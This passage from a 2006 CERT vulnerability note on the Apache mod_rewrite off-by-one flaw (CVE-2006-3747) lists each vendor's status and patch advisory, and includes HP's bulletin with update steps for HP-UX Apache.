this issue are available, see \n<http://fedora.redhat.com/Download/updates.html> \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Gentoo Linux __ Affected\n\nNotified: July 26, 2006 Updated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Gentoo Security Team has published Gentoo Linux Security Advisory [GLSA 200608-01/apache](<http://www.gentoo.org/security/en/glsa/glsa-200608-01.xml>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: July 26, 2006 Updated: September 15, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE-----` \n`Hash: SHA1` \n \n`SUPPORT COMMUNICATION - SECURITY BULLETIN` \n \n`Document ID: c00760969` \n \n`Version: 1` \n \n`HPSBUX02145 SSRT061202 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, ` \n`Denial of Service (DoS), and Unauthorized Access` \n \n`NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.` \n \n`Release Date: 2006-08-25` \n`Last Updated: 2006-08-28` \n \n`Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), ` \n`and unauthorized access.` \n \n`Source: Hewlett-Packard Company, HP Software Security Response Team` \n \n`VULNERABILITY SUMMARY` \n`Potential security vulnerabilities have been identified with Apache running on HP-UX. ` \n`These vulnerabilities could be exploited remotely to allow execution of arbitrary code, ` \n`Denial of Service (DoS), or unauthorized access.` \n \n`References: CVE-2006-3747, CVE-2005-3352, CVE-2005-3357` \n \n`SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.` \n`HP-UX B.11.00, B.11.11, B.11.23 running Apache-based Web Server prior to v.2.0.58.` \n \n`BACKGROUND` \n \n`The following potential security vulnerabilities are resolved in the ` \n`software update listed below:` \n \n`CVE-2006-3747 (cve.mitre.org): Off-by-one error in the ldap scheme handling.` \n`CVE-2005-3352 (cve.mitre.org): mod_ssl NULL pointer dereference.` \n`CVE-2005-3357 (cve.mitre.org): Remote arbitrary code execution.` \n \n`AFFECTED VERSIONS` \n \n`For IPv4:` \n`HP-UX B.11.00` \n`HP-UX B.11.11` \n`===========` \n`hpuxwsAPACHE` \n`action: install revision A.2.0.58.00 or subsequent` \n`action: restart Apache` \n \n`For IPv6:` \n`HP-UX B.11.11` \n`===========` \n`hpuxwsAPACHE,revision=B.1.0.00.01` \n`hpuxwsAPACHE,revision=B.1.0.07.01` \n`hpuxwsAPACHE,revision=B.1.0.08.01` \n`hpuxwsAPACHE,revision=B.1.0.09.01` \n`hpuxwsAPACHE,revision=B.1.0.10.01` \n`hpuxwsAPACHE,revision=B.2.0.48.00` \n`hpuxwsAPACHE,revision=B.2.0.49.00` \n`hpuxwsAPACHE,revision=B.2.0.50.00` \n`hpuxwsAPACHE,revision=B.2.0.51.00` \n`hpuxwsAPACHE,revision=B.2.0.52.00` \n`hpuxwsAPACHE,revision=B.2.0.53.00` \n`hpuxwsAPACHE,revision=B.2.0.54.00` \n`hpuxwsAPACHE,revision=B.2.0.55.00` \n`action: install revision B.2.0.58.00 or subsequent` \n`action: restart Apache` \n \n`HP-UX B.11.23` \n`===========` \n`hpuxwsAPACHE` \n`action: install revision B.2.0.58.00 or subsequent` \n`action: restart Apache` \n \n`END AFFECTED VERSIONS` \n \n`RESOLUTION` \n \n`HP has made the following patches and software updates available to resolve the issue.` \n \n`Software updates for the Apache-based Web Server are available from:` \n \n`<http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/>` \n`displayProductInfo.pl?productNumber=HPUXWSSUITE` \n \n`HP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server ` \n`v.2.0.58.00 or subsequent.` \n \n`Apache Update Procedure` \n \n`Check for Apache Installation` \n`- ----------------------------` \n`To determine if the Apache web server from HP is installed on your system, ` \n`use Software Distributor's swlist command. All three revisions of the product ` \n`may co-exist on a single system.` \n`For example, the results of the command` \n`swlist -l product | grep -i apache` \n`hpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server` \n \n`Stop Apache` \n`- -------------` \n`Before updating, make sure to stop any previous Apache binary. Otherwise, ` \n`the previous binary will continue running, preventing the new one from starting,` \n`although the installation would be successful. After determining which Apache is ` \n`installed, stop Apache with the following commands:` \n`for hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop` \n \n`Download and Install Apache` \n`- ---------------------------` \n`Download Apache from Software Depot:` \n \n`<http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/>` \n`displayProductInfo.pl?productNumber=HPUXWSSUITE` \n \n`Verify successful download by comparing the cksum with the value ` \n`specified on the installation web page.` \n \n`Use SD to swinstall the depot.` \n`Installation of this new revision of HP Apache over an existing HP Apache ` \n`installation is supported, while installation over a non-HP Apache is NOT supported.` \n \n`Removing Apache Installation` \n`- ----------------------------` \n`If you prefer to remove Apache from your system instead of installing a newer revision ` \n`to resolve the security problem, use both Software Distributor's \"swremove\" command ` \n`and also \"rm -rf\" the home location as specified in the rc.config.d file \"HOME\" variables.` \n`%ls /etc/rc.config.d | \\ grep apache hpapache2conf hpws_apache[32]conf` \n \n`MANUAL ACTIONS: Yes - Update plus other actions` \n`Install the revision of the product.` \n \n`PRODUCT SPECIFIC INFORMATION` \n`HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all ` \n`HP-issued Security Bulletins to provide a subset of recommended actions that potentially ` \n`affect a specific HP-UX system. For more information: <http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA>` \n \n`HISTORY: rev.1 - 28 August 2006 Initial Release` \n \n`Support: For further information, contact normal HP Services` \n`support channel.` \n \n`Report: To report a potential security vulnerability with any HP` \n`supported product, send Email to: security-alert@hp.com. It is` \n`strongly recommended that security related information being` \n`communicated to HP be encrypted using PGP, especially exploit` \n`information. To get the security-alert PGP key, please send an` \n`e-mail message as follows:` \n` To: security-alert@hp.com` \n` Subject: get key` \n \n`Subscribe: To initiate a subscription to receive future HP` \n`Security Bulletins via Email:` \n`[http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&](<http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&>)` \n`langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC` \n \n`On the web page: ITRC security bulletins and patch sign-up` \n`Under Step1: your ITRC security bulletins and patches` \n` - check ALL categories for which alerts are required and` \n` continue.` \n`Under Step2: your ITRC operating systems` \n` - verify your operating system selections are checked and` \n` save.` \n \n`To update an existing subscription:` \n`<http://h30046.www3.hp.com/subSignIn.php>` \n`Log in on the web page:` \n` Subscriber's choice for Business: sign-in.` \n`On the web page:` \n` Subscriber's Choice: your profile summary` \n` - use Edit Profile to update appropriate sections.` \n \n`To review previously published Security Bulletins visit:` \n`<http://www.itrc.hp.com/service/cki/secBullArchive.do>` \n \n`* The Software Product Category that this Security Bulletin` \n`relates to is represented by the 5th and 6th characters of the` \n`Bulletin number in the title:` \n \n` GN = HP General SW,` \n` MA = HP Management Agents,` \n` MI = Misc. 3rd party SW,` \n` MP = HP MPE/iX,` \n` NS = HP NonStop Servers,` \n` OV = HP OpenVMS,` \n` PI = HP Printing & Imaging,` \n` ST = HP Storage SW,` \n` TL = HP Trusted Linux,` \n` TU = HP Tru64 UNIX,` \n` UX = HP-UX,` \n` VV = HP Virtual Vault` \n \n \n`System management and security procedures must be reviewed` \n`frequently to maintain system integrity. HP is continually` \n`reviewing and enhancing the security features of software products` \n`to provide customers with current secure solutions.` \n \n`\"HP is broadly distributing this Security Bulletin in order to` \n`bring to the attention of users of the affected HP products the` \n`important security information contained in this Bulletin. HP` \n`recommends that all users determine the applicability of this` \n`information to their individual situations and take appropriate` \n`action. HP does not warrant that this information is necessarily` \n`accurate or complete for all user situations and, consequently, HP` \n`will not be responsible for any damages resulting from user's use` \n`or disregard of the information provided in this Bulletin. To the` \n`extent permitted by law, HP disclaims all warranties, either` \n`express or implied, including the warranties of merchantability` \n`and fitness for a particular purpose, title and non-infringement.\"` \n \n \n`(c)Copyright 2006 Hewlett-Packard Development Company, L.P.` \n`Hewlett-Packard Company shall not be liable for technical or` \n`editorial errors or omissions contained herein. The information` \n`provided is provided \"as is\" without warranty of any kind. To the` \n`extent permitted by law, neither HP nor its affiliates,` \n`subcontractors or suppliers will be liable for incidental, special` \n`or consequential damages including downtime cost; lost profits;` \n`damages relating to the procurement of substitute products or` \n`services; or damages for loss of data, or software restoration.` \n`The information in this document is subject to change without` \n`notice. Hewlett-Packard Company and the names of Hewlett-Packard` \n`products referenced herein are trademarks of Hewlett-Packard` \n`Company in the United States and other countries. Other product` \n`and company names mentioned herein may be trademarks of their` \n`respective owners.` \n`-----BEGIN PGP SIGNATURE-----` \n`Version: PGP 8.1` \n \n`iQA/AwUBRP1TReAfOvwtKn1ZEQLT9ACfWII/AKKvj7mlAZjWvCuL5RR7WjkAn38R` \n`t0wC8YEPUSa3cTZD5UhhZEiW` \n`=30XB` \n`-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Mandriva, Inc. __ Affected\n\nNotified: July 26, 2006 Updated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMandriva has published Mandriva Linux Security Advisory [MDKSA-2006:133](<http://www.mandriva.com/security/advisories?name=MDKSA-2006:133>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### OpenPKG __ Affected\n\nUpdated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe OpenPKG Project has published OpenPKG Security Advisory [OpenPKG-SA-2006.015](<http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.015-apache.html>) in response to this issue. Users are encouraged to review this advisory and apply the patches that it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Oracle Corporation __ Affected\n\nNotified: July 26, 2006 Updated: October 18, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.oracle.com/technology/deploy/security/critical-patch-updates/public_vuln_to_advisory_mapping.html>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### SUSE Linux __ Affected\n\nNotified: July 26, 2006 Updated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSUSE has published SUSE Security Announcement [SUSE-SA:2006:043](<http://www.novell.com/linux/security/advisories/2006_43_apache.html>) in response to this issue. Users are encouraged to review this announcement and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Slackware Linux Inc. __ Affected\n\nNotified: July 26, 2006 Updated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSlackware has published Slackware Security Advisory [SSA:2006-209-01](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.610131>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Ubuntu __ Affected\n\nNotified: July 26, 2006 Updated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Ubuntu project has published [Ubuntu Security Notice USN-328-1](<http://www.ubuntu.com/usn/usn-328-1>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Apple Computer, Inc. __ Not Affected\n\nNotified: July 26, 2006 Updated: July 27, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Mac OS X and Mac OS X Server do not contain this vulnerability.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu __ Not Affected\n\nNotified: July 26, 2006 Updated: July 27, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`We are investigating this issue. \nNo affected products have been identified.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi __ Not Affected\n\nNotified: July 26, 2006 Updated: July 31, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Hitachi Web Server does NOT support mod_rewrite module \nofficially and is NOT vulnerable to this issue.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. __ Not Affected\n\nNotified: July 26, 2006 Updated: July 27, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: July 26, 2006 Updated: July 31, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Openwall GNU/*/Linux is not vulnerable. We do not currently ship Apache.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. __ Not Affected\n\nUpdated: July 27, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Not vulnerable \n \nThis issue does not affect the version of Apache httpd as supplied with \nRed Hat Enterprise Linux 2.1 \n \nThe ability to exploit this issue is dependent on the stack layout for \na particular compiled version of mod_rewrite. If the compiler has \nadded padding to the stack immediately after the buffer being \noverwritten, this issue can not be exploited, and Apache httpd will \ncontinue operating normally. \n \nThe Red Hat Security Response Team analyzed Red Hat Enterprise Linux 3 \nand Red Hat Enterprise Linux 4 binaries for all architectures as \nshipped by Red Hat and determined that these versions cannot be \nexploited. We therefore do not plan on providing updates for this \nissue. \n \nFor technical details see: \n<https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=200219> \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Debian GNU/Linux __ Unknown\n\nNotified: July 26, 2006 Updated: August 03, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Debian project has published [Debian Security Advisory DSA 1132](<http://www.debian.org/security/2006/dsa-1132>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### EMC, Inc. (formerly Data General Corporation) Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer __ Unknown\n\nNotified: July 26, 2006 Updated: July 27, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\n`For information related to this and other published CERT Advisories that may \nrelate to the IBM eServer Platforms (xSeries, iSeries, pSeries, and zSeries) \nplease go to \n[https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&pathID=](<https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&pathID=>) \n \nIn order to access this information you will require a Resource Link ID. To \nsubscribe to Resource Link go to \n<http://app-06.www.ibm.com/servers/resourcelink> and follow the steps for \nregistration. \n \nAll questions should be referred to servsec@us.ibm.com. \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: July 26, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Trustix Secure Linux Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 43 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.apache.org/dist/httpd/Announcement2.2.html>\n * <http://www.apache.org/dist/httpd/Announcement2.0.html>\n * <http://www.apache.org/dist/httpd/Announcement1.3.html>\n * <http://secunia.com/advisories/21197/>\n * <http://secunia.com/advisories/21273/>\n * <http://secunia.com/advisories/21245/>\n * <http://secunia.com/advisories/21266/>\n * <http://secunia.com/advisories/21247/>\n * <http://secunia.com/advisories/21307/>\n * <http://secunia.com/advisories/21315/>\n * <http://secunia.com/advisories/21313/>\n * <http://secunia.com/advisories/21284/>\n * <http://www.niscc.gov.uk/niscc/docs/al-20060728-00515.html?lang=en>\n * <http://jvn.jp/cert/JVNVU%23395412/index.html>\n\n### Acknowledgements\n\nThanks to Mark Cox of the Apache Software Foundation for reporting this vulnerability. Mark, in turn, credits Mark Dowd of McAfee AVERT Labs with reporting this issue.\n\nThis document was written by Chad R Dougherty.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3747](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-3747>) \n---|--- \n**Severity Metric:** | 6.48 \n**Date Public:** | 2006-07-27 \n**Date First Published:** | 2006-07-28 \n**Date Last Updated: ** | 2006-10-18 12:52 UTC \n**Document Revision: ** | 43 \n", "modified": "2006-10-18T12:52:00", "published": "2006-07-28T00:00:00", "id": "VU:395412", "href": "https://www.kb.cert.org/vuls/id/395412", "type": "cert", "title": "Apache mod_rewrite contains off-by-one error in ldap scheme handling", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747", "CVE-2006-5752", "CVE-2007-1863", "CVE-2007-3304"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2007-07-02T15:01:38", "published": "2007-07-02T15:01:38", "id": "FEDORA:L62F1CGQ016053", "href": "", "type": "fedora", "title": "[SECURITY] Fedora Core 5 Update: httpd-2.2.2-1.3", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}]}